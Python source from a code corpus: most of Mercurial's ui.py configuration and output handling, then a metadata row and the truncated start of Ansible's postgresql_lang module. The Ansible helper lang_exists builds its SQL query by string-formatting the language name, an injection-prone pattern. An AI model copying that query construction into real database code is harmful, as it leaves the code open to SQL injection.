cfg.read(filename, fp, sections=sections, remap=remap)
fp.close()
except error.ConfigError as inst:
if trusted:
raise
self.warn(_("ignored: %s\n") % str(inst))
if self.plain():
for k in ('debug', 'fallbackencoding', 'quiet', 'slash',
'logtemplate', 'statuscopies', 'style',
'traceback', 'verbose'):
if k in cfg['ui']:
del cfg['ui'][k]
for k, v in cfg.items('defaults'):
del cfg['defaults'][k]
# Don't remove aliases from the configuration if in the exceptionlist
if self.plain('alias'):
for k, v in cfg.items('alias'):
del cfg['alias'][k]
if self.plain('revsetalias'):
for k, v in cfg.items('revsetalias'):
del cfg['revsetalias'][k]
if trusted:
self._tcfg.update(cfg)
self._tcfg.update(self._ocfg)
self._ucfg.update(cfg)
self._ucfg.update(self._ocfg)
if root is None:
root = os.path.expanduser('~')
self.fixconfig(root=root)
def fixconfig(self, root=None, section=None):
if section in (None, 'paths'):
# expand vars and ~
# translate paths relative to root (or home) into absolute paths
root = root or os.getcwd()
for c in self._tcfg, self._ucfg, self._ocfg:
for n, p in c.items('paths'):
if not p:
continue
if '%%' in p:
self.warn(_("(deprecated '%%' in path %s=%s from %s)\n")
% (n, p, self.configsource('paths', n)))
p = p.replace('%%', '%')
p = util.expandpath(p)
if not util.hasscheme(p) and not os.path.isabs(p):
p = os.path.normpath(os.path.join(root, p))
c.set("paths", n, p)
if section in (None, 'ui'):
# update ui options
self.debugflag = self.configbool('ui', 'debug')
self.verbose = self.debugflag or self.configbool('ui', 'verbose')
self.quiet = not self.debugflag and self.configbool('ui', 'quiet')
if self.verbose and self.quiet:
self.quiet = self.verbose = False
self._reportuntrusted = self.debugflag or self.configbool("ui",
"report_untrusted", True)
self.tracebackflag = self.configbool('ui', 'traceback', False)
if section in (None, 'trusted'):
# update trust information
self._trustusers.update(self.configlist('trusted', 'users'))
self._trustgroups.update(self.configlist('trusted', 'groups'))
def backupconfig(self, section, item):
return (self._ocfg.backup(section, item),
self._tcfg.backup(section, item),
self._ucfg.backup(section, item),)
def restoreconfig(self, data):
self._ocfg.restore(data[0])
self._tcfg.restore(data[1])
self._ucfg.restore(data[2])
def setconfig(self, section, name, value, source=''):
for cfg in (self._ocfg, self._tcfg, self._ucfg):
cfg.set(section, name, value, source)
self.fixconfig(section=section)
def _data(self, untrusted):
return untrusted and self._ucfg or self._tcfg
def configsource(self, section, name, untrusted=False):
return self._data(untrusted).source(section, name) or 'none'
def config(self, section, name, default=None, untrusted=False):
if isinstance(name, list):
alternates = name
else:
alternates = [name]
for n in alternates:
value = self._data(untrusted).get(section, n, None)
if value is not None:
name = n
break
else:
value = default
if self.debugflag and not untrusted and self._reportuntrusted:
for n in alternates:
uvalue = self._ucfg.get(section, n)
if uvalue is not None and uvalue != value:
self.debug("ignoring untrusted configuration option "
"%s.%s = %s\n" % (section, n, uvalue))
return value
def configsuboptions(self, section, name, default=None, untrusted=False):
"""Get a config option and all sub-options.
Some config options have sub-options that are declared with the
format "key:opt = value". This method is used to return the main
option and all its declared sub-options.
Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
is a dict of defined sub-options where keys and values are strings.
"""
data = self._data(untrusted)
main = data.get(section, name, default)
if self.debugflag and not untrusted and self._reportuntrusted:
uvalue = self._ucfg.get(section, name)
if uvalue is not None and uvalue != main:
self.debug('ignoring untrusted configuration option '
'%s.%s = %s\n' % (section, name, uvalue))
sub = {}
prefix = '%s:' % name
for k, v in data.items(section):
if k.startswith(prefix):
sub[k[len(prefix):]] = v
if self.debugflag and not untrusted and self._reportuntrusted:
for k, v in sub.items():
uvalue = self._ucfg.get(section, '%s:%s' % (name, k))
if uvalue is not None and uvalue != v:
self.debug('ignoring untrusted configuration option '
'%s:%s.%s = %s\n' % (section, name, k, uvalue))
return main, sub
def configpath(self, section, name, default=None, untrusted=False):
'get a path config item, expanded relative to repo root or config file'
v = self.config(section, name, default, untrusted)
if v is None:
return None
if not os.path.isabs(v) or "://" not in v:
src = self.configsource(section, name, untrusted)
if ':' in src:
base = os.path.dirname(src.rsplit(':')[0])
v = os.path.join(base, os.path.expanduser(v))
return v
def configbool(self, section, name, default=False, untrusted=False):
"""parse a configuration element as a boolean
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'true', 'yes')
>>> u.configbool(s, 'true')
True
>>> u.setconfig(s, 'false', 'no')
>>> u.configbool(s, 'false')
False
>>> u.configbool(s, 'unknown')
False
>>> u.configbool(s, 'unknown', True)
True
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configbool(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not a boolean ('somevalue')
"""
v = self.config(section, name, None, untrusted)
if v is None:
return default
if isinstance(v, bool):
return v
b = util.parsebool(v)
if b is None:
raise error.ConfigError(_("%s.%s is not a boolean ('%s')")
% (section, name, v))
return b
def configint(self, section, name, default=None, untrusted=False):
"""parse a configuration element as an integer
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'int1', '42')
>>> u.configint(s, 'int1')
42
>>> u.setconfig(s, 'int2', '-42')
>>> u.configint(s, 'int2')
-42
>>> u.configint(s, 'unknown', 7)
7
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configint(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not an integer ('somevalue')
"""
v = self.config(section, name, None, untrusted)
if v is None:
return default
try:
return int(v)
except ValueError:
raise error.ConfigError(_("%s.%s is not an integer ('%s')")
% (section, name, v))
def configbytes(self, section, name, default=0, untrusted=False):
"""parse a configuration element as a quantity in bytes
Units can be specified as b (bytes), k or kb (kilobytes), m or
mb (megabytes), g or gb (gigabytes).
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'val1', '42')
>>> u.configbytes(s, 'val1')
42
>>> u.setconfig(s, 'val2', '42.5 kb')
>>> u.configbytes(s, 'val2')
43520
>>> u.configbytes(s, 'unknown', '7 MB')
7340032
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configbytes(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not a byte quantity ('somevalue')
"""
value = self.config(section, name)
if value is None:
if not isinstance(default, str):
return default
value = default
try:
return util.sizetoint(value)
except error.ParseError:
raise error.ConfigError(_("%s.%s is not a byte quantity ('%s')")
% (section, name, value))
def configlist(self, section, name, default=None, untrusted=False):
"""parse a configuration element as a list of comma/space separated
strings
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'list1', 'this,is "a small" ,test')
>>> u.configlist(s, 'list1')
['this', 'is', 'a small', 'test']
"""
def _parse_plain(parts, s, offset):
whitespace = False
while offset < len(s) and (s[offset].isspace() or s[offset] == ','):
whitespace = True
offset += 1
if offset >= len(s):
return None, parts, offset
if whitespace:
parts.append('')
if s[offset] == '"' and not parts[-1]:
return _parse_quote, parts, offset + 1
elif s[offset] == '"' and parts[-1][-1] == '\\':
parts[-1] = parts[-1][:-1] + s[offset]
return _parse_plain, parts, offset + 1
parts[-1] += s[offset]
return _parse_plain, parts, offset + 1
def _parse_quote(parts, s, offset):
if offset < len(s) and s[offset] == '"': # ""
parts.append('')
offset += 1
while offset < len(s) and (s[offset].isspace() or
s[offset] == ','):
offset += 1
return _parse_plain, parts, offset
while offset < len(s) and s[offset] != '"':
if (s[offset] == '\\' and offset + 1 < len(s)
and s[offset + 1] == '"'):
offset += 1
parts[-1] += '"'
else:
parts[-1] += s[offset]
offset += 1
if offset >= len(s):
real_parts = _configlist(parts[-1])
if not real_parts:
parts[-1] = '"'
else:
real_parts[0] = '"' + real_parts[0]
parts = parts[:-1]
parts.extend(real_parts)
return None, parts, offset
offset += 1
while offset < len(s) and s[offset] in [' ', ',']:
offset += 1
if offset < len(s):
if offset + 1 == len(s) and s[offset] == '"':
parts[-1] += '"'
offset += 1
else:
parts.append('')
else:
return None, parts, offset
return _parse_plain, parts, offset
def _configlist(s):
s = s.rstrip(' ,')
if not s:
return []
parser, parts, offset = _parse_plain, [''], 0
while parser:
parser, parts, offset = parser(parts, s, offset)
return parts
result = self.config(section, name, untrusted=untrusted)
if result is None:
result = default or []
if isinstance(result, basestring):
result = _configlist(result.lstrip(' ,\n'))
if result is None:
result = default or []
return result
def hasconfig(self, section, name, untrusted=False):
return self._data(untrusted).hasitem(section, name)
def has_section(self, section, untrusted=False):
'''tell whether section exists in config.'''
return section in self._data(untrusted)
def configitems(self, section, untrusted=False, ignoresub=False):
items = self._data(untrusted).items(section)
if ignoresub:
newitems = {}
for k, v in items:
if ':' not in k:
newitems[k] = v
items = newitems.items()
if self.debugflag and not untrusted and self._reportuntrusted:
for k, v in self._ucfg.items(section):
if self._tcfg.get(section, k) != v:
self.debug("ignoring untrusted configuration option "
"%s.%s = %s\n" % (section, k, v))
return items
def walkconfig(self, untrusted=False):
cfg = self._data(untrusted)
for section in cfg.sections():
for name, value in self.configitems(section, untrusted):
yield section, name, value
def plain(self, feature=None):
'''is plain mode active?
Plain mode means that all configuration variables which affect
the behavior and output of Mercurial should be
ignored. Additionally, the output should be stable,
reproducible and suitable for use in scripts or applications.
The only way to trigger plain mode is by setting either the
`HGPLAIN' or `HGPLAINEXCEPT' environment variables.
The return value can either be
- False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
- True otherwise
'''
if 'HGPLAIN' not in os.environ and 'HGPLAINEXCEPT' not in os.environ:
return False
exceptions = os.environ.get('HGPLAINEXCEPT', '').strip().split(',')
if feature and exceptions:
return feature not in exceptions
return True
def username(self):
"""Return default username to be used in commits.
Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
and stop searching if one of these is set.
If not found and ui.askusername is True, ask the user, else use
($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
"""
user = os.environ.get("HGUSER")
if user is None:
user = self.config("ui", ["username", "user"])
if user is not None:
user = os.path.expandvars(user)
if user is None:
user = os.environ.get("EMAIL")
if user is None and self.configbool("ui", "askusername"):
user = self.prompt(_("enter a commit username:"), default=None)
if user is None and not self.interactive():
try:
user = '%s@%s' % (util.getuser(), socket.getfqdn())
self.warn(_("no username found, using '%s' instead\n") % user)
except KeyError:
pass
if not user:
raise error.Abort(_('no username supplied'),
hint=_('use "hg config --edit" '
'to set your username'))
if "\n" in user:
raise error.Abort(_("username %s contains a newline\n")
% repr(user))
return user
def shortuser(self, user):
"""Return a short representation of a user name or email address."""
if not self.verbose:
user = util.shortuser(user)
return user
def expandpath(self, loc, default=None):
"""Return repository location relative to cwd or from [paths]"""
try:
p = self.paths.getpath(loc)
if p:
return p.rawloc
except error.RepoError:
pass
if default:
try:
p = self.paths.getpath(default)
if p:
return p.rawloc
except error.RepoError:
pass
return loc
@util.propertycache
def paths(self):
return paths(self)
def pushbuffer(self, error=False, subproc=False, labeled=False):
"""install a buffer to capture standard output of the ui object
If error is True, the error output will be captured too.
If subproc is True, output from subprocesses (typically hooks) will be
captured too.
If labeled is True, any labels associated with buffered
output will be handled. By default, this has no effect
on the output returned, but extensions and GUI tools may
handle this argument and returned styled output. If output
is being buffered so it can be captured and parsed or
processed, labeled should not be set to True.
"""
self._buffers.append([])
self._bufferstates.append((error, subproc, labeled))
self._bufferapplylabels = labeled
def popbuffer(self):
'''pop the last buffer and return the buffered output'''
self._bufferstates.pop()
if self._bufferstates:
self._bufferapplylabels = self._bufferstates[-1][2]
else:
self._bufferapplylabels = None
return "".join(self._buffers.pop())
def write(self, *args, **opts):
'''write args to output
By default, this method simply writes to the buffer or stdout,
but extensions or GUI tools may override this method,
write_err(), popbuffer(), and label() to style output from
various parts of hg.
An optional keyword argument, "label", can be passed in.
This should be a string containing label names separated by
space. Label names take the form of "topic.type". For example,
ui.debug() issues a label of "ui.debug".
When labeling output for a specific command, a label of
"cmdname.type" is recommended. For example, status issues
a label of "status.modified" for modified files.
'''
if self._buffers:
self._buffers[-1].extend(a for a in args)
else:
self._progclear()
for a in args:
self.fout.write(a)
def write_err(self, *args, **opts):
self._progclear()
try:
if self._bufferstates and self._bufferstates[-1][0]:
return self.write(*args, **opts)
if not getattr(self.fout, 'closed', False):
self.fout.flush()
for a in args:
self.ferr.write(a)
# stderr may be buffered under win32 when redirected to files,
# including stdout.
if not getattr(self.ferr, 'closed', False):
self.ferr.flush()
except IOError as inst:
if inst.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
raise
def flush(self):
try: self.fout.flush()
except (IOError, ValueError): pass
try: self.ferr.flush()
except (IOError, ValueError): pass
def _isatty(self, fh):
if self.configbool('ui', 'nontty', False):
return False
return util.isatty(fh)
def interactive(self):
'''is interactive input allowed?
An interactive session is a session where input can be reasonably read
from `sys.stdin'. If this function returns false, any attempt to read
from stdin should fail with an error, unless a sensible default has been
specified.
Interactiveness is triggered by the value of the `ui.interactive'
configuration variable or - if it is unset - when `sys.stdin' points
to a terminal device.
This function refers to input only; for output, see `ui.formatted()'.
'''
i = self.configbool("ui", "interactive", None)
if i is None:
# some environments replace stdin without implementing isatty
# usually those are non-interactive
return self._isatty(self.fin)
return i
def termwidth(self):
'''how wide is the terminal in columns?
'''
if 'COLUMNS' in os.environ:
try:
return int(os.environ['COLUMNS'])
except ValueError:
pass
return util.termwidth()
def formatted(self):
'''should formatted output be used?
It is often desirable to format the output to suite the output medium.
Examples of this are truncating long lines or colorizing messages.
However, this is not often not desirable when piping output into other
utilities, e.g. `grep'.
Formatted output is triggered by the value of the `ui.formatted'
configuration variable or - if it is unset - when `sys.stdout' points
to a terminal device. Please note that `ui.formatted' should be
considered an implementation detail; it is not intended for use outside
Mercurial or its extensions.
This function refers to output only; for input, see `ui.interactive()'.
This function always returns false when in plain mode, see `ui.plain()'.
'''
if self.plain():
return False
i = self.configbool("ui", "formatted", None)
if i is None:
# some environments replace stdout without implementing isatty
# usually those are non-interactive
return self._isatty(self.fout)
return i
def _readline(self, prompt=''):
if self._isatty(self.fin):
try:
# magically add command line editing support, where
# available
import readline
# force demandimport to really load the module
readline.read_history_file
# windows sometimes raises something other than ImportError
except Exception:
pass
# call write() so output goes through subclassed implementation
# e.g. color extension on Windows
self.write(prompt)
# instead of trying to emulate raw_input, swap (self.fin,
# self.fout) with (sys.stdin, sys.stdout)
oldin = sys.stdin
oldout = sys.stdout
sys.stdin = self.fin
sys.stdout = self.fout
# prompt ' ' must exist; otherwise readline may delete entire line
# - http://bugs.python.org/issue12833
line = raw_input(' ')
sys.stdin = oldin
sys.stdout = oldout
# When stdin is in binary mode on Windows, it can cause
# raw_input() to emit an extra trailing carriage return
if os.linesep == '\r\n' and line and line[-1] == '\r':
line = line[:-1]
return line
def prompt(self, msg, default="y"):
"""Prompt user with msg, read response.
If ui is not interactive, the default is returned.
"""
if not self.interactive():
self.write(msg, ' ', default or '', "\n")
return default
try:
r = self._readline(self.label(msg, 'ui.prompt'))
if not r:
r = default
if self.configbool('ui', 'promptecho'):
self.write(r, "\n")
return r
except EOFError:
raise error.ResponseExpected()
@staticmethod
def extractchoices(prompt):
"""Extract prompt message and list of choices from specified prompt.
This returns tuple "(message, choices)", and "choices" is the
list of tuple "(response character, text without &)".
>>> ui.extractchoices("awake? $$ &Yes $$ &No")
('awake? ', [('y', 'Yes'), ('n', 'No')])
>>> ui.extractchoices("line\\nbreak? $$ &Yes $$ &No")
('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
>>> ui.extractchoices("want lots of $$money$$?$$Ye&s$$N&o")
('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
"""
# Sadly, the prompt string may have been built with a filename
# containing "$$" so let's try to find the first valid-looking
# prompt to start parsing. Sadly, we also can't rely on
# choices containing spaces, ASCII, or basically anything
# except an ampersand followed by a character.
m = re.match(r'(?s)(.+?)\$\$([^\$]*&[^ \$].*)', prompt)
msg = m.group(1)
choices = [p.strip(' ') for p in m.group(2).split('$$')]
return (msg,
[(s[s.index('&') + 1].lower(), s.replace('&', '', 1))
for s in choices])
def promptchoice(self, prompt, default=0):
"""Prompt user with a message, read response, and ensure it matches
one of the provided choices. The prompt is formatted as follows:
"would you like fries with that (Yn)? $$ &Yes $$ &No"
The index of the choice is returned. Responses are case
insensitive. If ui is not interactive, the default is
returned.
"""
msg, choices = self.extractchoices(prompt)
resps = [r for r, t in choices]
while True:
r = self.prompt(msg, resps[default])
if r.lower() in resps:
return resps.index(r.lower())
self.write(_("unrecognized response\n"))
def getpass(self, prompt=None, default=None):
if not self.interactive():
return default
try:
self.write_err(self.label(prompt or _('password: '), 'ui.prompt'))
# disable getpass() only if explicitly specified. it's still valid
# to interact with tty even if fin is not a tty.
if self.configbool('ui', 'nontty'):
return self.fin.readline().rstrip('\n')
else:
return getpass.getpass('')
except EOFError:
raise error.ResponseExpected()
def status(self, *msg, **opts):
'''write status message to output (if ui.quiet is False)
This adds an output label of "ui.status".
'''
if not self.quiet:
opts['label'] = opts.get('label', '') + ' ui.status'
self.write(*msg, **opts)
def warn(self, *msg, **opts):
'''write warning message to output (stderr)
This adds an output label of "ui.warning".
'''
opts['label'] = opts.get('label', '') + ' ui.warning'
self.write_err(*msg, **opts)
def note(self, *msg, **opts):
'''write note to output (if ui.verbose is True)
This adds an output label of "ui.note".
'''
if self.verbose:
opts['label'] = opts.get('label', '') + ' ui.note'
self.write(*msg, **opts)
def debug(self, *msg, **opts):
'''write debug message to output (if ui.debugflag is True)
This adds an output label of "ui.debug".
'''
if self.debugflag:
opts['label'] = opts.get('label', '') + ' ui.debug'
self.write(*msg, **opts)
def edit(self, text, user, extra=None, editform=None, pending=None):
extra_defaults = { 'prefix': 'editor' }
if extra is not None:
extra_defaults.update(extra)
extra = extra_defaults
(fd, name) = tempfile.mkstemp(prefix='hg-' + extra['prefix'] + '-',
suffix=".txt", text=True)
try:
f = os.fdopen(fd, "w")
f.write(text)
f.close()
environ = {'HGUSER': user}
if 'transplant_source' in extra:
environ.update({'HGREVISION': hex(extra['transplant_source'])})
for label in ('intermediate-source', 'source', 'rebase_source'):
if label in extra:
environ.update({'HGREVISION': extra[label]})
break
if editform:
environ.update({'HGEDITFORM': editform})
if pending:
environ.update({'HG_PENDING': pending})
editor = self.geteditor()
self.system("%s \"%s\"" % (editor, name),
environ=environ,
onerr=error.Abort, errprefix=_("edit failed"))
f = open(name)
t = f.read()
f.close()
finally:
os.unlink(name)
return t
def system(self, cmd, environ=None, cwd=None, onerr=None, errprefix=None):
'''execute shell command with appropriate output stream. command
output will be redirected if fout is not stdout.
'''
out = self.fout
if any(s[1] for s in self._bufferstates):
out = self
return util.system(cmd, environ=environ, cwd=cwd, onerr=onerr,
errprefix=errprefix, out=out)
def traceback(self, exc=None, force=False):
'''print exception traceback if traceback printing enabled or forced.
only to call in exception handler. returns true if traceback
printed.'''
if self.tracebackflag or force:
if exc is None:
exc = sys.exc_info()
cause = getattr(exc[1], 'cause', None)
if cause is not None:
causetb = traceback.format_tb(cause[2])
exctb = traceback.format_tb(exc[2])
exconly = traceback.format_exception_only(cause[0], cause[1])
# exclude frame where 'exc' was chained and rethrown from exctb
self.write_err('Traceback (most recent call last):\n',
''.join(exctb[:-1]),
''.join(causetb),
''.join(exconly))
else:
output = traceback.format_exception(exc[0], exc[1], exc[2])
self.write_err(''.join(output))
return self.tracebackflag or force
def geteditor(self):
'''return editor to use'''
if sys.platform == 'plan9':
# vi is the MIPS instruction simulator on Plan 9. We
# instead default to E to plumb commit messages to
# avoid confusion.
editor = 'E'
else:
editor = 'vi'
return (os.environ.get("HGEDITOR") or
self.config("ui", "editor") or
os.environ.get("VISUAL") or
os.environ.get("EDITOR", editor))
@util.propertycache
def _progbar(self):
"""setup the progbar singleton to the ui object"""
if (self.quiet or self.debugflag
or self.configbool('progress', 'disable', False)
or not progress.shouldprint(self)):
return None
return getprogbar(self)
def _progclear(self):
"""clear progress bar output if any. use it before any output"""
if '_progbar' not in vars(self): # nothing loaded yet
return
if self._progbar is not None and self._progbar.printed:
self._progbar.clear()
def progress(self, topic, pos, item="", unit="", total=None):
'''show a progress message
With stock hg, this is simply a debug message that is hidden
by default, but with extensions or GUI tools it may be
visible. 'topic' is the current operation, 'item' is a
non-numeric marker of the current position (i.e. the currently
in-process file), 'pos' is the current numeric position (i.e.
revision, bytes, etc.), unit is a corresponding unit label,
and total is the highest expected pos.
Multiple nested topics may be active at a time.
All topics should be marked closed by setting pos to None at
termination.
'''
if self._progbar is not None:
self._progbar.progress(topic, pos, item=item, unit=unit,
total=total)
if pos is None or not self.configbool('progress', 'debug'):
return
if unit:
unit = ' ' + unit
if item:
item = ' ' + item
if total:
pct = 100.0 * pos / total
self.debug('%s:%s %s/%s%s (%4.2f%%)\n'
% (topic, item, pos, total, unit, pct))
else:
self.debug('%s:%s %s%s\n' % (topic, item, pos, unit))
def log(self, service, *msg, **opts):
'''hook for logging facility extensions
service should be a readily-identifiable subsystem, which will
allow filtering.
*msg should be a newline-terminated format string to log, and
then any values to %-format into that format string.
**opts currently has no defined meanings.
'''
def label(self, msg, label):
'''style msg based on supplied label
Like ui.write(), this just returns msg unchanged, but extensions
and GUI tools can override it to allow styling output without
writing it.
ui.write(s, 'label') is equivalent to
ui.write(ui.label(s, 'label')).
'''
return msg
def develwarn(self, msg, stacklevel=1):
"""issue a developer warning message
Use 'stacklevel' to report the offender some layers further up in the
stack.
"""
msg = 'devel-warn: ' + msg
stacklevel += 1 # get in develwarn
if self.tracebackflag:
util.debugstacktrace(msg, stacklevel, self.ferr, self.fout)
else:
curframe = inspect.currentframe()
calframe = inspect.getouterframes(curframe, 2)
self.write_err('%s at: %s:%s (%s)\n'
% ((msg,) + calframe[stacklevel][1:4]))
def deprecwarn(self, msg, version):
"""issue a deprecation warning
- msg: message explaining what is deprecated and how to upgrade,
- version: last version where the API will be supported,
"""
msg += ("\n(compatibility will be dropped after Mercurial-%s,"
" update your code.)") % version
self.develwarn(msg, stacklevel=2)
class paths(dict):
"""Represents a collection of paths and their configs.
Data is initially derived from ui instances and the config files they have
loaded.
"""
def __init__(self, ui):
dict.__init__(self)
for name, loc in ui.configitems('paths', ignoresub=True):
# No location is the same as not existing.
if not loc:
continue
loc, sub = ui.configsuboptions('paths', name)
self[name] = path(ui, name, rawloc=loc, suboptions=sub)
def getpath(self, name, default=None):
"""Return a ``path`` from a string, falling back to default.
``name`` can be a named path or locations. Locations are filesystem
paths or URIs.
Returns None if ``name`` is not a registered path, a URI, or a local
path to a repo.
"""
# Only fall back to default if no path was requested.
if name is None:
if not default:
default = ()
elif not isinstance(default, (tuple, list)):
default = (default,)
for k in default:
try:
return self[k]
except KeyError:
continue
return None
# Most likely empty string.
# This may need to raise in the future.
if not name:
return None
try:
return self[name]
except KeyError:
# Try to resolve as a local path or URI.
try:
# We don't pass sub-options in, so no need to pass ui instance.
return path(None, None, rawloc=name)
except ValueError:
raise error.RepoError(_('repository %s does not exist') %
name)
_pathsuboptions = {}
def pathsuboption(option, attr):
"""Decorator used to declare a path sub-option.
Arguments are the sub-option name and the attribute it should set on
``path`` instances.
The decorated function will receive as arguments a ``ui`` instance,
``path`` instance, and the string value of this option from the config.
The function should return the value that will be set on the ``path``
instance.
This decorator can be used to perform additional verification of
sub-options and to change the type of sub-options.
"""
def register(func):
_pathsuboptions[option] = (attr, func)
return func
return register
@pathsuboption('pushurl', 'pushloc')
def pushurlpathoption(ui, path, value):
u = util.url(value)
# Actually require a URL.
if not u.scheme:
ui.warn(_('(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
return None
# Don't support the #foo syntax in the push URL to declare branch to
# push.
if u.fragment:
ui.warn(_('("#fragment" in paths.%s:pushurl not supported; '
'ignoring)\n') % path.name)
u.fragment = None
return str(u)
class path(object):
"""Represents an individual path and its configuration."""
def __init__(self, ui, name, rawloc=None, suboptions=None):
"""Construct a path from its config options.
``ui`` is the ``ui`` instance the path is coming from.
``name`` is the symbolic name of the path.
``rawloc`` is the raw location, as defined in the config.
``pushloc`` is the raw locations pushes should be made to.
If ``name`` is not defined, we require that the location be a) a local
filesystem path with a .hg directory or b) a URL. If not,
``ValueError`` is raised.
"""
if not rawloc:
raise ValueError('rawloc must be defined')
# Locations may define branches via syntax <base>#<branch>.
u = util.url(rawloc)
branch = None
if u.fragment:
branch = u.fragment
u.fragment = None
self.url = u
self.branch = branch
self.name = name
self.rawloc = rawloc
self.loc = str(u)
# When given a raw location but not a symbolic name, validate the
# location is valid.
if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
raise ValueError('location is not a URL or path to a local '
'repo: %s' % rawloc)
suboptions = suboptions or {}
# Now process the sub-options. If a sub-option is registered, its
# attribute will always be present. The value will be None if there
# was no valid sub-option.
for suboption, (attr, func) in _pathsuboptions.iteritems():
if suboption not in suboptions:
setattr(self, attr, None)
continue
value = func(ui, self, suboptions[suboption])
setattr(self, attr, value)
def _isvalidlocalpath(self, path):
"""Returns True if the given path is a potentially valid repository.
This is its own function so that extensions can change the definition of
'valid' in this case (like when pulling from a git repo into a hg
one)."""
return os.path.isdir(os.path.join(path, '.hg'))
@property
def suboptions(self):
"""Return sub-options and their values for this path.
This is intended to be used for presentation purposes.
"""
d = {}
for subopt, (attr, _func) in _pathsuboptions.iteritems():
value = getattr(self, attr)
if value is not None:
d[subopt] = value
return d
# we instantiate one globally shared progress bar to avoid
# competing progress bars when multiple UI objects get created
_progresssingleton = None
def getprogbar(ui):
global _progresssingleton
if _progresssingleton is None:
# passing 'ui' object to the singleton is fishy,
# this is how the extension used to work but feel free to rework it.
_progresssingleton = progress.progbar(ui)
return _progresssingleton
| gpl-2.0 | 2,602,354,919,809,655,300 | -5,017,552,082,869,698,000 | 35.209026 | 80 | 0.551233 | false |
valentin-krasontovitsch/ansible | lib/ansible/modules/database/postgresql/postgresql_lang.py | 1 | 11522 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2014, Jens Depuydt <http://www.jensd.be>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: postgresql_lang
short_description: Adds, removes or changes procedural languages with a PostgreSQL database.
description:
- Adds, removes or changes procedural languages with a PostgreSQL database.
- This module allows you to add a language, remote a language or change the trust
relationship with a PostgreSQL database. The module can be used on the machine
where executed or on a remote host.
- When removing a language from a database, it is possible that dependencies prevent
the database from being removed. In that case, you can specify casade to
automatically drop objects that depend on the language (such as functions in the
language). In case the language can't be deleted because it is required by the
database system, you can specify fail_on_drop=no to ignore the error.
- Be carefull when marking a language as trusted since this could be a potential
security breach. Untrusted languages allow only users with the PostgreSQL superuser
privilege to use this language to create new functions.
version_added: "1.7"
options:
lang:
description:
- name of the procedural language to add, remove or change
required: true
trust:
description:
- make this language trusted for the selected db
type: bool
default: 'no'
db:
description:
- name of database where the language will be added, removed or changed
force_trust:
description:
- marks the language as trusted, even if it's marked as untrusted in pg_pltemplate.
- use with care!
type: bool
default: 'no'
fail_on_drop:
description:
- if C(yes), fail when removing a language. Otherwise just log and continue
- in some cases, it is not possible to remove a language (used by the db-system). When dependencies block the removal, consider using C(cascade).
type: bool
default: 'yes'
cascade:
description:
- when dropping a language, also delete object that depend on this language.
- only used when C(state=absent).
type: bool
default: 'no'
port:
description:
- Database port to connect to.
default: 5432
login_user:
description:
- User used to authenticate with PostgreSQL
default: postgres
login_password:
description:
- Password used to authenticate with PostgreSQL (must match C(login_user))
login_host:
description:
- Host running PostgreSQL where you want to execute the actions.
default: localhost
state:
description:
- The state of the language for the selected database
default: present
choices: [ "present", "absent" ]
login_unix_socket:
description:
- Path to a Unix domain socket for local connections.
version_added: '2.8'
ssl_mode:
description:
- Determines whether or with what priority a secure SSL TCP/IP connection
will be negotiated with the server.
- See U(https://www.postgresql.org/docs/current/static/libpq-ssl.html) for
more information on the modes.
- Default of C(prefer) matches libpq default.
default: prefer
choices: ["disable", "allow", "prefer", "require", "verify-ca", "verify-full"]
version_added: '2.8'
ssl_rootcert:
description:
- Specifies the name of a file containing SSL certificate authority (CA)
certificate(s). If the file exists, the server's certificate will be
verified to be signed by one of these authorities.
version_added: '2.8'
notes:
- The default authentication assumes that you are either logging in as or
sudo'ing to the postgres account on the host.
- This module uses psycopg2, a Python PostgreSQL database adapter. You must
ensure that psycopg2 is installed on the host before using this module. If
the remote host is the PostgreSQL server (which is the default case), then
PostgreSQL must also be installed on the remote host. For Ubuntu-based
systems, install the postgresql, libpq-dev, and python-psycopg2 packages
on the remote host before using this module.
requirements: [ psycopg2 ]
author:
- "Jens Depuydt (@jensdepuydt)"
- "Thomas O'Donnell (@andytom)"
'''
EXAMPLES = '''
# Add language pltclu to database testdb if it doesn't exist:
- postgresql_lang db=testdb lang=pltclu state=present
# Add language pltclu to database testdb if it doesn't exist and mark it as trusted:
# Marks the language as trusted if it exists but isn't trusted yet
# force_trust makes sure that the language will be marked as trusted
- postgresql_lang:
db: testdb
lang: pltclu
state: present
trust: yes
force_trust: yes
# Remove language pltclu from database testdb:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
# Remove language pltclu from database testdb and remove all dependencies:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
cascade: yes
# Remove language c from database testdb but ignore errors if something prevents the removal:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
fail_on_drop: no
'''
import traceback
try:
import psycopg2
except ImportError:
postgresqldb_found = False
else:
postgresqldb_found = True
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_native
def lang_exists(cursor, lang):
"""Checks if language exists for db"""
query = "SELECT lanname FROM pg_language WHERE lanname='%s'" % lang
cursor.execute(query)
return cursor.rowcount > 0
def lang_istrusted(cursor, lang):
"""Checks if language is trusted for db"""
